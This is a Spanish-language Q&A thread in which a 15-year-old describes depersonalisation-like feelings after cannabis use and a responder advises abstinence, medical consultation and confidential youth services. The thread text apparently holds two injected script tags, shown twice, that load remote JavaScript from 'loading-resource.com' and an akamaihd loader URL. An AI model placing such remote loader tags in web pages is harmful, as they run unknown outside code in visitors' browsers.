Me siento como raro por fumar

Voi a ser breve, llevo fumando hachís y marihuana desde hace como 3 años las primeras veces i eso si que estaba muy empanado los días siguientes y como raro pero con el tiempo me acostumbre y mas o menos hace un año empecé como a esentirme raro los días siguientes después de fumar al principio eran solo episodios pero ahora es todo el día

Es como que se me cierran caminos al hablar, tengo vergüenza salir a la calle cosas así quizás el efecto mas notable es que veo todo como diferente como si lo viera desde los ojos de otro algo muy raro, deje de fumar dos semanas y me encontraba un poco mejor así que le di una calada a un porro y los siguientes días me encontré bien hasta el segundo o el tercer día que me volvieron esos efectos aber si me puedes ayudar sobre que es y de como lo puedo quitar

1 Respuesta

Respuesta

Cada cuerpo reacciona de manera diferente al hachís, pero hay personas que les puede pasar ya que pueden ser más sensibles. Yo lo que te aconsejaría es que te abstengas por completo del hachís y la marihuana por un tiempo, si no consumes no te tiene que volver a pasar.

Si observaras que tienes estos síntomas después de no consumir nada durante más de 1 mes, esta sustancia tiene muchos efectos residuales que aguantan en el organismo durante mucho tiempo, deberás de consultarlo con un médico y posiblemente requiera algún tipo de medicación.

Espero haber resuelto tus dudas, para cualquier otra cosa consulta de nuevo.

Saludos

Merxe

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

hola,gracias por contestar pero tengo un par de preguntas mas

1. si huelo el humo de la maría o del polen cuando fuman porros mis colegas

me afecta? no lo digo por que me den ganas de fumar eso lo aguanto quiero decir si cuando lo huela va a ser como si yo fume.

2. no puedo ir a ningún medico porque solo tengo quince años y nadie sabe que fumo ni nada ahí alguna manera de que lo puedacuraryo ?

saludos y gracias.

Por estar mientras otros fumen maría, no hay problema respecto a la toxicidad, aunque sí respecto que te entren ganas de hacerlo. Es como si a alguien que está a dieta y le encantan los dulces, tiene dulces y golosinas en el armario de casa, un día aguantará, otro puede que también, pero cuando uno está en clara intención de estar abstinencia, a la larga le puede perjudicar. Por otro parte en principio oler el humo no tiene porque perjudicarte pero puede que seas muy sensible y entonces debes observar si los síntomas desaparecen o no.

Por lo de la edad, no te preocupes aquí en España existen teléfonos totalmente confidenciales, y programas especializados y no importa la edad que tengas, ni que seas menor de edad, lo importante es que estés bien. Además el médico como ética debe de guardarte secreto profesional, como los demás profesionales de la salud.

No te puedo dar ninguna fórmula o receta para que te cures sólo porque es muy complejo, como te decía antes cada persona es un mundo, los síntomas pueden ser diferentes y se necesitan más datos para poder evaluar. Los síntomas que me cuentas en el primer mensaje si no han desaparecido por completo, es importante que los puede consultar con un especialista de tu a tu, y nunca automedicarse.

Si necesitas teléfonos o páginas de referencia, o sitios donde puedas ir, no dudes en consultarme. Lo puedes hacer por privado, lo primero es que tú estés bien.

Para cualquier cosa ya sabes, contáctame de nuevo.

Te deseo lo mejor

Saludos

Merxe

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>